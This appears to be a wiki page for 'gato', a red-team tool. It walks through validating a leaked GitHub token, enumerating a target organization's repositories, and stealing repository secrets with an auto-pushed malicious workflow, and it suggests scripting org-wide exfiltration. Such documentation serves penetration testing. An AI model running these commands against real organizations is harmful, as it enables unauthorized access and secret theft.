-
Notifications
You must be signed in to change notification settings - Fork 53
Scenarios
This page is a living document of real-world examples where gato is useful. At a high level: I have X, how can I do Y?
This is where gato is most useful as a tool. Suppose you are conducting a penetration test or red team and identify a personal access token hard-coded in a script.
The first step is to validate the token: gato e -v
Suppose your target is EvilCorp, and you find that the user is a member of EvilCorp:
gato -s e -t evilcorp -oJ evilcorp_gato.json
The above command will list and enumerate all repositories within the evilcorp GitHub organization. It will determine the user's permissions to each repository and provide you with everything that that user can access and how to take advantage of it.
Suppose gato finds that the user can access secrets from EvilRepository, and because the token has the workflow scope, the user can steal them with a malicious workflow.
gato -s attack -t evilcorp/evilrepository --secrets --delete-action
Gato will create a new branch, push a workflow to it, wait for the workflow to execute, and then download the run log which will contain asymmetrically encrypted secrets using a just-in-time public key. This is to prevent broader compromise if someone looks at the run-log.
Gato will then decrypt the secrets and print them. Gato only supports exfiltrating secrets from one repository at a time. Nothing stops you from writing a wrapper script to exfiltrate secrets from an entire organization if you so choose.
TODO
TODO
gato -s enumerate -t targetOrg -oJ target_org_gato.json